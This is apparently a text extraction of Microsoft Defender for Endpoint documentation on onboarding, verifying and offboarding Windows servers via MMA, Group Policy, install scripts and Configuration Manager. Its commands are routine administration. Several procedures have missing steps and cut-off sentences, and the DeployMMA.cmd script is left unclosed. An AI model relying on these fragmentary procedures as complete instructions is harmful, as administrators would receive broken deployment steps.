Internet connectivity settings section.
Once completed, you should see onboarded endpoints in the portal within an hour.
Configure proxy and Internet connectivity

settings
If your servers need to use a proxy to communicate with Defender for Endpoint, use one
of the following methods to configure the MMA to use the proxy server:
Configure the MMA to use a proxy server
Configure Windows to use a proxy server for all connections
If a proxy or firewall is in use, please ensure that servers can access all of the Microsoft
Defender for Endpoint service URLs directly and without SSL interception. For more
information, see enable access to Microsoft Defender for Endpoint service URLs. Use of
SSL interception will prevent the system from communicating with the Defender for
Endpoint service.
Once completed, you should see onboarded Windows servers in the portal within an
hour.
Onboard Windows servers through Microsoft

Defender for Cloud
1. In the Microsoft Defender XDR navigation pane, select Settings > Endpoints >
Device management > Onboarding.
2. Select Windows Server 2008 R2 SP1 as the operating system.

3. Click Onboard Servers in Microsoft Defender for Cloud.
4. Follow the onboarding instructions in Microsoft Defender for Endpoint with

Microsoft Defender for Cloud and If you are using Azure ARC, follow the
onboarding instructions in Enabling the Microsoft Defender for Endpoint
integration.
After completing the onboarding steps, you'll need to Configure and update System
Center Endpoint Protection clients.
７ Note
For onboarding via Microsoft Defender for servers to work as expected, the
server must have an appropriate workspace and key configured within the
Microsoft Monitoring Agent (MMA) settings.
Once configured, the appropriate cloud management pack is deployed on the
machine and the sensor process (MsSenseS.exe) will be deployed and started.
This is also required if the server is configured to use an OMS Gateway server
as proxy.
Verify onboarding
Verify that Microsoft Defender Antivirus and Microsoft Defender for Endpoint are
running.
７ Note
Running Microsoft Defender Antivirus is not required but it is recommended. If

another antivirus vendor product is the primary endpoint protection solution, you
can run Defender Antivirus in Passive mode. You can only confirm that passive
mode is on after verifying that Microsoft Defender for Endpoint sensor (SENSE) is
running.
７ Note
As Microsoft Defender Antivirus is only supported for Windows 10 and Windows

11, step 1 does not apply when running Windows Server 2008 R2 SP1.
1. Run the following command to verify that Microsoft Defender Antivirus is installed:
dos
sc.exe query Windefend
If the result is 'The specified service doesn't exist as an installed service', then you'll
need to install Microsoft Defender Antivirus. For more information, see Microsoft
Defender Antivirus in Windows 10.
For information on how to use Group Policy to configure and manage Microsoft
Defender Antivirus on your Windows servers, see Use Group Policy settings to
configure and manage Microsoft Defender Antivirus.
If you encounter issues with onboarding, see Troubleshoot onboarding.

Follow the steps in Run a detection test on a newly onboarded device to verify that the
server is reporting to Defender for the Endpoint service.
Onboarding endpoints with no management

solution
Using Group Policy

Step 1: Download the corresponding update for your endpoint.
1. Navigate to c:\windows\sysvol\domain\scripts (Change control could be needed

on one of the domain controllers.)
2. Create a folder named MMA.
3. Download the following and place them in the MMA folder:
Update for customer experience and diagnostic telemetry:

For Windows Server 2008 R2 x64
For Windows Server 2008 R2 SP1, following updates are also required:
February 2018 Monthly Roll up - KB4074598 (Windows Server 2008 R2)
Microsoft Update Catalog

Download updates for Windows Server 2008 R2 x64
.NET Framework 3.5.1 (KB315418)
For Windows Server 2008 R2 x64
７ Note
This article assumes you are using x64-based servers (MMA Agent .exe x64
New SHA-2 compliant version).
Step 2: Create a file name DeployMMA.cmd (using notepad) Add the following lines to
the cmd file. Note that you'll need your WORKSPACE ID and KEY.
The following command is an example. Replace the following values:
KB - Use the applicable KB relevant to the endpoint you're onboarding

Workspace ID and KEY - Use your ID and key
dos
@echo off
cd "C:"
IF EXIST "C:\Program Files\Microsoft Monitoring
Agent\Agent\MonitoringHost.exe" (
exit
) ELSE (
wusa.exe C:\Windows\MMA\Windows6.1-KB3080149-x64.msu /quiet /norestart

"c:\windows\MMA\MMASetup-AMD64.exe" /c /t:"C:\Windows\MMA"
c:\windows\MMA\setup.exe /qn NOAPM=1 ADD_OPINSIGHTS_WORKSPACE=1
OPINSIGHTS_WORKSPACE_ID="<your workspace ID>" OPINSIGHTS_WORKSPACE_KEY="
<your workspace key>" AcceptEndUserLicenseAgreement=1
Group Policy Configuration

Create a new group policy specifically for onboarding devices such as "Microsoft
Defender for Endpoint Onboarding".
Create a Group Policy Folder named "c:\windows\MMA"


This will add a new folder on every server that gets the GPO applied, called
MMA, and will be stored in c:\windows. This will contain the installation files for
the MMA, prerequisites, and install script.
Create a Group Policy Files preference for each of the files stored in Net logon.
It copies the files from DOMAIN\NETLOGON\MMA\filename to

C:\windows\MMA\filename - so the installation files are local to the server:

Repeat the process but create item level targeting on the COMMON tab, so the file only
gets copied to the appropriate platform/Operating system version in scope:

For Windows Server 2008 R2 you'll need (and it will only copy down) the following:
Windows6.1-KB3080149-x64.msu
Once this is done, you'll need to create a start-up script policy:


The name of the file to run here is c:\windows\MMA\DeployMMA.cmd. Once the server
is restarted as part of the start-up process it will install the Update for customer
experience and diagnostic telemetry KB, and then install the MMA Agent, while setting
the Workspace ID and Key, and the server will be onboarded.
You could also use an immediate task to run the deployMMA.cmd if you don't want to
reboot all the servers.
This could be done in two phases. First create the files and the folder in GPO - Give the
system time to ensure the GPO has been applied, and all the servers have the install
files. Then, add the immediate task. This will achieve the same result without requiring a
reboot.
As the Script has an exit method and wont re-run if the MMA is installed, you could also
use a daily scheduled task to achieve the same result. Similar to a Configuration
Manager compliance policy it will check daily to ensure the MMA is present.



As mentioned in the onboarding documentation for Server specifically around Server

2008 R2 please see below: For Windows Server 2008 R2 SP1, ensure that you fulfill the
following requirements:
Install the February 2018 monthly update rollup

Install either .NET framework 4.5 (or later) or KB3154518
Please check the KBs are present before onboarding Windows Server 2008 R2. This
process allows you to onboard all the servers if you don't have Configuration Manager
managing Servers.
Offboard endpoints
You have two options to offboard Windows endpoints from the service:
Uninstall the MMA agent

Remove the Defender for Endpoint workspace configuration
７ Note
Offboarding causes the Windows endpoint to stop sending sensor data to the
portal but data from the endpoint, including reference to any alerts it has had will
be retained for up to 6 months.

To offboard the Windows endpoint, you can uninstall the MMA agent or detach it from
reporting to your Defender for Endpoint workspace. After offboarding the agent, the
endpoint will no longer send sensor data to Defender for Endpoint. For more
information, see To disable an agent.
Remove the Defender for Endpoint workspace

configuration
You can use either of the following methods:
Remove the Defender for Endpoint workspace configuration from the MMA agent
Run a PowerShell command to remove the configuration
Remove the Defender for Endpoint workspace configuration from

the MMA agent
1. In the Microsoft Monitoring Agent Properties, select the Azure Log Analytics
(OMS) tab.
2. Select the Defender for Endpoint workspace, and click Remove.


Run a PowerShell command to remove the configuration

1. Get your Workspace ID:
a. In the navigation pane, select Settings > Onboarding.
b. Select the relevant operating system and get your Workspace ID.
2. Open an elevated PowerShell and run the following command. Use the Workspace
ID you obtained and replacing WorkspaceID :
PowerShell
$AgentCfg = New-Object -ComObject AgentConfigManager.MgmtSvcCfg
# Remove OMS Workspace

$AgentCfg.RemoveCloudWorkspace("WorkspaceID")
# Reload the configuration and apply changes

$AgentCfg.ReloadConfiguration()
 Tip
Feedback

Defender for Endpoint onboarding
Windows Server
Article • 11/15/2023
Applies to:

Windows Server 2016
Windows Server Semi-Annual Enterprise Channel
Windows Server 2022
You'll need to go through the onboarding section of the Defender for Endpoint portal to
onboard any of the supported devices. Depending on the device, you'll be guided with
appropriate steps and provided management and deployment tool options suitable for
the device.
Defender for Endpoint extends support to also include the Windows Server operating
system. This support provides advanced attack detection and investigation capabilities
seamlessly through the Microsoft Defender XDR console. Support for Windows Server
provides deeper insight into server activities, coverage for kernel and memory attack
detection, and enables response actions.
This topic describes how to onboard specific Windows servers to Microsoft Defender for
Endpoint.
For guidance on how to download and use Windows Security Baselines for Windows
servers, see Windows Security Baselines.
Windows Server onboarding overview

You'll need to complete the following general steps to successfully onboard servers
2008 R2, 2012 R2, 2016, 2019, 2022.

Windows Server 2012 R2 and Windows Server 2016

Download installation and onboarding packages.
Apply the installation package.
Follow the onboarding steps for the corresponding tool.
Windows Server Semi-Annual Enterprise Channel and

Windows Server 2019
Download the onboarding package.
Follow the onboarding steps for the corresponding tool.
Offboard Windows servers

You can offboard Windows Server 2012 R2, Windows Server 2016, Windows Server
(SAC), Windows Server 2019, and Windows Server 2019 Core edition with the same
method available for Windows 10 client devices.

Offboard and monitor devices using Mobile Device Management tools
After offboarding, you can proceed to uninstall the unified solution package on
Windows Server 2012 R2 and Windows Server 2016.
For other Windows server versions, you have two options to offboard Windows servers
from the service:

７ Note
These offboarding instructions for other Windows server versions also apply if you
are running the previous Microsoft Defender for Endpoint for Windows Server 2016
and Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the
new unified solution are at Server migration scenarios in Microsoft Defender for
Endpoint.
Related topics
 Tip
Feedback

Onboard Windows servers to the
Microsoft Defender for Endpoint service
Article • 07/12/2023
Applies to:

Windows Server 2016
Windows Server Semi-Annual Enterprise Channel
Windows Server 2022
Defender for Endpoint extends support to also include the Windows Server operating
system. This support provides advanced attack detection and investigation capabilities
seamlessly through the Microsoft Defender XDR console. Support for Windows Server
provides deeper insight into server activities, coverage for kernel and memory attack
detection, and enables response actions.
This article describes how to onboard specific Windows servers to Microsoft Defender
for Endpoint.
For guidance on how to download and use Windows Security Baselines for Windows
servers, see Windows Security Baselines.
Windows Server onboarding overview

You'll need to complete the following general steps to successfully onboard servers.

７ Note
Windows Hyper-V Server editions are not supported.
Integration with Microsoft Defender for Servers:
Microsoft Defender for Endpoint integrates seamlessly with Microsoft Defender for
Servers. You can onboard servers automatically, have servers monitored by Microsoft
Defender for Cloud appear in Defender for Endpoint, and conduct detailed
investigations as a Microsoft Defender for Cloud customer. For more information please
go to Protect your endpoints with Defender for Cloud's integrated EDR solution:
７ Note
For Windows Server 2012 R2 and 2016, you can either manually install/upgrade the
modern, unified solution on these machines, or use the integration to automatically
deploy or upgrade servers covered by your respective Microsoft Defender for
Server plan. More information about making the switch at Protect your endpoints
with Defender for Cloud's integrated EDR solution: Microsoft Defender for
Endpoint.
When you use Microsoft Defender for Cloud to monitor servers, a Defender
for Endpoint tenant is automatically created (in the US for US users, in the EU
for European users, and in the UK for UK users). Data collected by Defender
for Endpoint is stored in the geo-location of the tenant as identified during
provisioning.
If you use Defender for Endpoint before using Microsoft Defender for Cloud,
your data will be stored in the location you specified when you created your
tenant even if you integrate with Microsoft Defender for Cloud at a later time.
Once configured, you cannot change the location where your data is stored. If
you need to move your data to another location, you need to contact
Microsoft Support to reset the tenant.
Server endpoint monitoring utilizing this integration has been disabled for
Office 365 GCC customers.
Previously, the use of the Microsoft Monitoring Agent (MMA) on Windows
Server 2016 and previous versions of Windows Server allowed for the OMS /
Log Analytics gateway to provide connectivity to Defender cloud services. The
new solution, like Microsoft Defender for Endpoint on Windows Server 2019,
Windows Server 2022, and Windows 10, doesn't support this gateway.
Linux servers onboarded through Microsoft Defender for Cloud will have their
initial configuration set to run Defender Antivirus in passive mode.
Windows Server 2012 R2 and Windows Server 2016:
Download installation and onboarding packages

Apply the installation package
Follow the onboarding steps for the corresponding tool
Windows Server Semi-Annual Enterprise Channel and Windows Server 2019:
Download the onboarding package

Follow the onboarding steps for the corresponding tool
Windows Server 2012 R2 and Windows Server

2016
New Windows Server 2012 R2 and 2016 functionality in

the modern unified solution
The previous implementation (before April of 2022) of onboarding Windows Server
2012 R2 and Windows Server 2016 required the use of Microsoft Monitoring Agent
(MMA).
The new unified solution package makes it easier to onboard servers by removing
dependencies and installation steps. It also provides a much expanded feature set. For
more information, please refer to Defending Windows Server 2012 R2 and 2016 .
Depending on the server that you're onboarding, the unified solution installs Microsoft
Defender Antivirus and/or the EDR sensor. The following table indicates what
component is installed and what is built in by default.
ﾉ Expand table
Server version AV EDR
Windows Server 2016 Built-in
Windows Server 2019 or later Built-in Built-in
If you've previously onboarded your servers using MMA, follow the guidance provided
in Server migration to migrate to the new solution.
） Important
Before proceeding with onboarding, see the section Known issues and limitations
in the new, unified solution package for Windows Server 2012 R2 and 2016.
Prerequisites
Prerequisites for Windows Server 2012 R2

If you've fully updated your machines with the latest monthly rollup package, there
are no other prerequisites and the below requirements will already be filled.
The installer package will check if the following components have already been installed
via an update to assess if minimum requirements have been met for a successful
installation:
Update for customer experience and diagnostic telemetry

Update for Universal C Runtime in Windows
Security Update for Windows Server 2012 R2 (KB3045999)
Prerequisites for Windows Server 2016

It's recommended to install the latest available SSU and LCU on the server.
The Servicing Stack Update (SSU) from September 14, 2021 or later must be
installed.
The Latest Cumulative Update (LCU) from September 20, 2018 or later must be
installed.
Enable the Microsoft Defender Antivirus feature and ensure it's up to date. For
more information on enabling Defender Antivirus on Windows Server, see Re-
enable Defender Antivirus on Windows Server if it was disabled and Re-enable
Defender Antivirus on Windows Server if it was uninstalled.
Download and install the latest platform version using Windows Update.
Alternatively, download the update package manually from the Microsoft Update
Catalog or from MMPC .
Prerequisites for running with third-party security solutions
If you intend to use a third-party anti-malware solution, you'll need to run Microsoft
Defender Antivirus in passive mode. You must remember to set to passive mode during
the installation and onboarding process.
７ Note
If you're installing Microsoft Defender for Endpoint on Servers with McAfee

Endpoint Security (ENS) or VirusScan Enterprise (VSE), the version of the McAfee
platform may need to be updated to ensure Microsoft Defender Antivirus is not
removed or disabled. For more information including the specific version numbers
required, see, McAfee Knowledge Center article .
Update packages for Microsoft Defender for Endpoint on Windows

Server 2012 R2 and 2016
To receive regular product improvements and fixes for the EDR Sensor component,
ensure Windows Update KB5005292 gets applied or approved. In addition, to keep
protection components updated, see Manage Microsoft Defender Antivirus updates and
apply baselines.
If you're using Windows Server Update Services (WSUS) and/or Microsoft Endpoint
Configuration Manager, this new "Microsoft Defender for Endpoint update for EDR
Sensor" is available under the category "Microsoft Defender for Endpoint".
Onboarding steps summary
STEP 1: Download the installation and onboarding packages
STEP 2: Apply the installation and onboarding package
STEP 3: Complete the onboarding steps
STEP 1: Download installation and onboarding packages

You'll need to download both the installation and onboarding packages from the
portal.
７ Note
The installation package is updated monthly. Be sure to download the latest

package before usage. To update after installation, you do not have to run the
installer package again. If you do, the installer will ask you to offboard first as that
is a requirement for uninstallation. See Update packages for Microsoft Defender
for Endpoint on Windows Server 2012 R2 and 2016.
７ Note
On Windows Server 2012R2, Microsoft Defender Antivirus will get installed by the
installation package and will be active unless you set it to passive mode. On
Windows Server 2016, Microsoft Defender Antivirus must be installed as a feature
(see Switch to MDE) first and fully updated before proceeding with the installation.
If you are running a non-Microsoft anti-malware solution ensure you add

exclusions for Microsoft Defender Antivirus (from this list of Microsoft Defender
Processes on the Defender Processes tab ) to the non-Microsoft solution before
installation. It is also recommended to add non-Microsoft security solutions to the
Defender Antivirus exclusion list.
The installation package contains an MSI file that installs the Microsoft Defender for
Endpoint agent.
The onboarding package contains the following file:
WindowsDefenderATPOnboardingScript.cmd - contains the onboarding script
Follow these steps to download the packages:
1. In Microsoft Defender XDR, go to Settings > Endpoint > Onboarding.
2. Select Windows Server 2012 R2 and 2016.
3. Select Download installation package and save the .msi file.
4. Select Download onboarding package and save the .zip file.
5. Install the installation package using any of the options to install Microsoft
Defender Antivirus. The installation requires administrative permissions.
） Important
A local onboarding script is suitable for a proof of concept but should not be used
for production deployment. For a production deployment, we recommend using
Group Policy, or Microsoft Endpoint Configuration Manager.
STEP 2: Apply the installation and onboarding package

In this step, you'll install the prevention and detection components required before
onboarding your device to the Microsoft Defender for Endpoint cloud environment, to
prepare the machine for onboarding. Ensure all prerequisites have been met.
７ Note
Microsoft Defender Antivirus will get installed and will be active unless you set it to
passive mode.
Options to install the Microsoft Defender for Endpoint packages

In the previous section, you downloaded an installation package. The installation
package contains the installer for all Microsoft Defender for Endpoint components.
You can use any of the following options to install the agent:
Install using the command line

Install using a script
Apply the installation and onboarding packages using Group Policy
Install Microsoft Defender For Endpoint using the command line
Use the installation package from the previous step to install Microsoft Defender for
Endpoint.
Run the following command to install Microsoft Defender for Endpoint:
Console
Msiexec /i md4ws.msi /quiet
To uninstall, ensure the machine is offboarded first using the appropriate offboarding
script. Then, use Control Panel > Programs > Programs and Features to perform the
uninstall.
Alternatively, run the following uninstall command to uninstall Microsoft Defender for
Endpoint:
Console
Msiexec /x md4ws.msi /quiet
You must use the same package you used for installation for the above command to
succeed.
The /quiet switch suppresses all notifications.
７ Note
Microsoft Defender Antivirus doesn't automatically go into passive mode. You can
choose to set Microsoft Defender Antivirus to run in passive mode if you are
running a non-Microsoft antivirus/antimalware solution. For command line
installations, the optional FORCEPASSIVEMODE=1 immediately sets the Microsoft
Defender Antivirus component to Passive mode to avoid interference. Then, to
ensure Defender Antivirus remains in passive mode after onboarding to support
capabilities like EDR Block, set the "ForceDefenderPassiveMode" registry key.
Support for Windows Server provides deeper insight into server activities, coverage for
kernel and memory attack detection, and enables response actions.
Install Microsoft Defender for Endpoint using a script
You can use the installer helper script to help automate installation, uninstallation, and
onboarding.
７ Note
The installation script is signed. Any modifications to the script will invalidate the
signature. When you download the script from GitHub, the recommended
approach to avoid inadvertent modification is to download the source files as a zip
archive then extract it to obtain the install.ps1 file (on the main Code page, click the
Code dropdown menu and select "Download ZIP").
This script can be used in various scenarios, including those scenarios described in
Server migration scenarios from the previous, MMA-based Microsoft Defender for
Endpoint solution and for deployment using Group Policy as described below.
Apply the Microsoft Defender for Endpoint installation and

onboarding packages using Group policy
1. Create a group policy:

Open the Group Policy Management Console (GPMC), right-click Group Policy
Objects you want to configure and select New. Enter the name of the new GPO in
the dialogue box that is displayed and select OK.
Object (GPO) you want to configure and select Edit.

Windows 7).
5. In the Task window that opens, go to the General tab. Under Security options
select Change User or Group and type SYSTEM and then select Check Names then
OK. NT AUTHORITY\SYSTEM appears as the user account the task will run as.
the Action field. The installer script handles the installation, and immediately
perform the onboarding step after installation completes. Select
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe then provide the
arguments:
PowerShell
-ExecutionPolicy RemoteSigned \\servername-or-dfs-space\share-

name\install.ps1 -OnboardingScript \\servername-or-dfs-space\share-
name\windowsdefenderatponboardingscript.cmd
７ Note
The recommended execution policy setting is Allsigned . This requires

importing the script's signing certificate into the Local Computer Trusted
Publishers store if the script is running as SYSTEM on the endpoint.
Replace \\servername-or-dfs-space\share-name with the UNC path, using the file

server's fully qualified domain name (FQDN), of the shared install.ps1 file. The
installer package md4ws.msi must be placed in the same directory. Ensure that the
permissions of the UNC path allow write access to the computer account that is
installing the package, to support creation of log files. If you wish to disable the
creation of log files (not recommended), you can use the -noETL -noMSILog
parameters.
For scenarios where you want Microsoft Defender Antivirus to co-exist with non-
Microsoft antimalware solutions, add the $Passive parameter to set passive mode
during installation.
that you wish to link. Select OK.
For more configuration settings, see Configure sample collection settings and Other
recommended configuration settings.
STEP 3: Complete the onboarding steps

The following steps are only applicable if you're using a third-party anti-malware
solution. You'll need to apply the following Microsoft Defender Antivirus passive mode
setting. Verify that it was configured correctly:
1. Set the following registry entry:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection

Name: ForceDefenderPassiveMode
Type: REG_DWORD
Value: 1
Known issues and limitations in the new, unified solution package

for Windows Server 2012 R2 and 2016
） Important
Always download the latest installer package from the Microsoft Defender portal
(https://security.microsoft.com ) before performing a new installation and ensure
prerequisites have been met. After installation, ensure to regularly update using
component updates described in the section Update packages for Microsoft
Defender for Endpoint on Windows Server 2012 R2 and 2016.
An operating system update can introduce an installation issue on machines with

slower disks due to a timeout with service installation. Installation fails with the
message "Could not find c:\program files\windows defender\mpasdesc.dll, - 310
WinDefend". Use the latest installation package, and the latest install.ps1 script
to help clear the failed installation if necessary.
We've identified an issue with Windows Server 2012 R2 connectivity to cloud when
static TelemetryProxyServer is used and the certificate revocation list (CRL) URLs
aren't reachable from the SYSTEM account context. Ensure the EDR sensor is
updated to version 10.8210.* or later (using KB5005292 ) to resolve the issue.
Alternatively, use a different proxy option ("system-wide") that provides such
connectivity, or configure the same proxy via the WinInet setting on the SYSTEM
account context.
On Windows Server 2012 R2, there's no user interface for Microsoft Defender
Antivirus. In addition, the user interface on Windows Server 2016 only allows for
basic operations. To perform operations on a device locally, refer to Manage
Microsoft Defender for Endpoint with PowerShell, WMI, and MPCmdRun.exe. As a
result, features that specifically rely on user interaction, such as where the user is
prompted to make a decision or perform a specific task, may not work as expected.
It's recommended to disable or not enable the user interface nor require user
interaction on any managed server as it may impact protection capability.
Not all Attack Surface Reduction rules are applicable to all operating systems. See
Attack surface reduction rules.
Operating system upgrades aren't supported. Offboard then uninstall before
upgrading. The installer package can only be used to upgrade installations that
have not yet been updated with new antimalware platform or EDR sensor update
packages.
Automatic exclusions for server roles aren't supported on Windows Server 2012
R2; however, built-in exclusions for operating system files are. For more
information about adding exclusions, see Configure Microsoft Defender Antivirus
exclusions on Windows Server.
To automatically deploy and onboard the new solution using Microsoft Endpoint
Configuration Manager (MECM) you need to be on version 2207 or later. You can
still configure and deploy using version 2107 with the hotfix rollup, but this
requires additional deployment steps. See Microsoft Endpoint Configuration
Manager migration scenarios for more information.
Windows Server Semi-Annual Enterprise

Channel (SAC), Windows Server 2019 and
Windows Server 2022
Download package
1. In Microsoft Defender XDR, go to Settings > Endpoints > Device Management >
Onboarding.
2. Select Windows Server 1803 and 2019.
3. Select Download package. Save it as

WindowsDefenderATPOnboardingPackage.zip.
4. Follow the steps provided in the Complete the onboarding steps section.
Verify the onboarding and installation

Verify that Microsoft Defender Antivirus and Microsoft Defender for Endpoint are
running.

７ Note
Running Microsoft Defender Antivirus is not required but it is recommended. If

another antivirus vendor product is the primary endpoint protection solution, you
can run Defender Antivirus in Passive mode. You can only confirm that passive
mode is on after verifying that Microsoft Defender for Endpoint sensor (SENSE) is
running.
1. Run the following command to verify that Microsoft Defender Antivirus is installed:
７ Note
This verification step is only required if you're using Microsoft Defender

Antivirus as your active antimalware solution.
sc.exe query Windefend
If the result is 'The specified service doesn't exist as an installed service', then you'll
need to install Microsoft Defender Antivirus.
For information on how to use Group Policy to configure and manage Microsoft
Defender Antivirus on your Windows servers, see Use Group Policy settings to
configure and manage Microsoft Defender Antivirus.
2. Run the following command to verify that Microsoft Defender for Endpoint is
running:
sc.exe query sense
The result should show it's running. If you encounter issues with onboarding, see
Troubleshoot onboarding.

Follow the steps in Run a detection test on a newly onboarded device to verify that the
server is reporting to Defender for the Endpoint service.
Next steps
After successfully onboarding devices to the service, you'll need to configure the
individual components of Microsoft Defender for Endpoint. Follow Configure capabilities
to be guided on enabling the various components.
Offboard Windows servers

You can offboard Windows Server 2012 R2, Windows Server 2016, Windows Server
(SAC), Windows Server 2019, and Windows Server 2019 Core edition in the same
method available for Windows 10 client devices.

Offboard devices using Mobile Device Management tools
After offboarding, you can proceed to uninstall the unified solution package on
Windows Server 2012 R2 and Windows Server 2016.
For other Windows server versions, you have two options to offboard Windows servers
from the service:

７ Note
These offboarding instructions for other Windows server versions also apply if you
are running the previous Microsoft Defender for Endpoint for Windows Server 2016
and Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the
new unified solution are at Server migration scenarios in Microsoft Defender for
Endpoint.
Related articles
Onboard Windows 10 devices
Configure proxy and Internet connectivity settings
Run a detection test on a newly onboarded Defender for Endpoint device
Troubleshooting Microsoft Defender for Endpoint onboarding issues
Microsoft Entra seamless single sign-on
Troubleshoot onboarding issues related to Security Management for Microsoft
 Tip
Feedback

Onboard Windows devices using
Article • 12/06/2023
Applies to:

Microsoft Configuration Manager current branch
Prerequisites
Endpoint Protection point site system role
） Important
The Endpoint Protection point site system role is required so that antivirus and
attack surface reduction policies are properly deployed to the targeted endpoints.
Without this role, the endpoints in the device collection won't receive the
configured antivirus and attack surface reduction policies.
You can use Configuration Manager to onboard endpoints to the Microsoft Defender for
Endpoint service.
There are several options you can use to onboard devices using Configuration Manager:
Onboard devices using System Center Configuration Manager

Tenant attach
For Windows Server 2012 R2 and Windows Server 2016 - after completing the
onboarding steps, you'll need to Configure and update System Center Endpoint
Protection clients.
７ Note
Defender for Endpoint doesn't support onboarding during the Out-Of-Box
Experience (OOBE) phase. Make sure users complete OOBE after running Windows
installation or upgrading.
Note that it's possible to create a detection rule on a Configuration Manager

application to continuously check if a device has been onboarded. An application is
a different type of object than a package and program. If a device is not yet
onboarded (due to pending OOBE completion or any other reason), Configuration
Manager will retry to onboard the device until the rule detects the status change.
This behavior can be accomplished by creating a detection rule checking if the

"OnboardingState" registry value (of type REG_DWORD) = 1. This registry value is
located under "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat
Protection\Status". For more information, see Configure Detection Methods in
System Center 2012 R2 Configuration Manager.

７ Note
These configuration settings are typically done through Configuration Manager.
You can set a compliance rule for configuration item in Configuration Manager to
change the sample share setting on a device.
This rule should be a remediating compliance rule configuration item that sets the value
of a registry key on targeted devices to make sure they're compliant.
text

Value: 0 or 1
Where Key type is a D-WORD. Possible values are:

0: Doesn't allow sample sharing from this device
1: Allows sharing of all file types from this device
For more information about System Center Configuration Manager Compliance, see
Introduction to compliance settings in System Center 2012 R2 Configuration Manager.
Onboard Windows devices using Microsoft Configuration

Manager
Collection creation
Onboarding using tools such as Group Policy or a manual method doesn't install any
agents on the system.
Within the Microsoft Configuration Manager console, the onboarding process will be
management point.
Follow these steps to onboard endpoints using Microsoft Configuration Manager:

Compliance > Overview > Device Collections.

2. Select and hold (or right-click) Device Collection and select Create Device
Collection.


5. Select Next on the Direct Membership Wizard and then select Edit Query
Statement.

number, operator as is greater than or equal to and value 14393, and select OK.

9. Select Next.

After completing this task you have a device collection with all the Windows endpoints
in the environment.

Device collection configuration

If you're using Configuration Manager, version 2002 or later, you can choose to broaden
the deployment to include servers or down-level clients.

Scan
Scan removable storage devices such as USB drives: Yes
Enable Behavioral Monitoring: Yes
Enable protection against Potentially Unwanted Applications at download and
prior to installation: Yes

Cloud Protection Service membership type: Advanced membership

７ Note
detections.
For deploying Microsoft Defender Antivirus and attack surface reduction policies
through Microsoft Configuration Manager (SCCM) follow the steps:
Enable Endpoint Protection and configure custom client settings.

Install the Endpoint Protection client from a command prompt.
Verify the Endpoint Protection client installation.
Enable Endpoint Protection and configure custom client settings
Follow the steps to enable endpoint protection and configuration of custom client
settings:
1. In the Configuration Manager console, click Administration.
2. In the Administration workspace, click Client Settings.
3. On the Home tab, in the Create group, click Create Custom Client Device Settings.
4. In the Create Custom Client Device Settings dialog box, provide a name and a
description for the group of settings, and then select Endpoint Protection.
5. Configure the Endpoint Protection client settings that you require. For a full list of
Endpoint Protection client settings that you can configure, see the Endpoint
Protection section in About client settings.
） Important
Install the Endpoint Protection site system role before you configure client
settings for Endpoint Protection.
6. Click OK to close the Create Custom Client Device Settings dialog box. The new
client settings are displayed in the Client Settings node of the Administration
workspace.
7. Next, deploy the custom client settings to a collection. Select the custom client
settings you want to deploy. In the Home tab, in the Client Settings group, click
Deploy.
8. In the Select Collection dialog box, choose the collection to which you want to
deploy the client settings and then click OK. The new deployment is shown in the
Deployments tab of the details pane.
Clients are configured with these settings when they next download client policy. For
more information, see Initiate policy retrieval for a Configuration Manager client.
Installation of Endpoint Protection client from a command prompt
Follow the steps to complete installation of endpoint protection client from the
command prompt.
1. Copy scepinstall.exe from the Client folder of the Configuration Manager

installation folder to the computer on which you want to install the Endpoint
Protection client software.
2. Open a command prompt as an administrator. Change directory to the folder with

the installer. Then run scepinstall.exe , adding any extra command-line properties
that you require:
ﾉ Expand table
/s Run the installer silently
/q Extract the setup files silently
/i Run the installer normally

/policy Specify an antimalware policy file to configure the client during installation
/sqmoptin Opt-in to the Microsoft Customer Experience Improvement Program (CEIP)
3. Follow the on-screen instructions to complete the client installation.
4. If you downloaded the latest update definition package, copy the package to the
client computer, and then double-click the definition package to install it.
７ Note
After the Endpoint Protection client install completes, the client automatically
performs a definition update check. If this update check succeeds, you don't
have to manually install the latest definition update package.
Example: install the client with an antimalware policy
scepinstall.exe /policy <full path>\<policy file>
Verify the Endpoint Protection client installation
After you install the Endpoint Protection client on your reference computer, verify that
the client is working correctly.
1. On the reference computer, open System Center Endpoint Protection from the
Windows notification area.
2. On the Home tab of the System Center Endpoint Protection dialog box, verify that
Real-time protection is set to On.
3. Verify that up to date is displayed for Virus and spyware definitions.
4. To make sure that your reference computer is ready for imaging, under Scan
options, select Full, and then click Scan now.
Network protection
Prior to enabling network protection in audit or block mode, ensure that you've installed
the antimalware platform update, which can be obtained from the support page .

Enable the feature in audit mode for at least 30 days. After this period, review detections
and create a list of applications that are allowed to write to protected directories.
For more information, see Evaluate controlled folder access.


When downloading an offboarding package, you will be notified of the packages expiry
７ Note
Offboard devices using Microsoft Configuration Manager

current branch
If you use Microsoft Configuration Manager current branch, see Create an offboarding
configuration file.
Offboard devices using System Center 2012 R2

Offboarding.
c. In the Deployment method field, select System Center Configuration Manager
2012/2012 R2/1511/1602.
d. Select Download package, and save the .zip file.
have a file named WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-
DD.cmd.
3. Deploy the package by following the steps in the Packages and Programs in
System Center 2012 R2 Configuration Manager article.
Choose a predefined device collection to deploy the package to.
） Important
to 6 months.

If you're using Microsoft Configuration Manager current branch, use the built-in
Defender for Endpoint dashboard in the Configuration Manager console. For more
information, see Defender for Endpoint - Monitor.
If you're using System Center 2012 R2 Configuration Manager, monitoring consists of

two parts:
1. Confirming the configuration package has been correctly deployed and is running
(or has successfully run) on the devices in your network.
2. Checking that the devices are compliant with the Defender for Endpoint service
(this ensures the device can complete the onboarding process and can continue to
report data to the service).
Confirm the configuration package has been correctly

deployed
1. In the Configuration Manager console, click Monitoring at the bottom of the
navigation pane.
2. Select Overview and then Deployments.
3. Select on the deployment with the package name.

4. Review the status indicators under Completion Statistics and Content Status.
If there are failed deployments (devices with Error, Requirements Not Met, or
Failed statuses), you may need to troubleshoot the devices. For more information,
see, Troubleshoot Microsoft Defender for Endpoint onboarding issues.
Check that the devices are compliant with the Microsoft

You can set a compliance rule for configuration item in System Center 2012 R2
Configuration Manager to monitor your deployment.
This rule should be a non-remediating compliance rule configuration item that monitors
the value of a registry key on targeted devices.
Monitor the following registry key entry:
Console
Path: "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status"

Name: "OnboardingState"
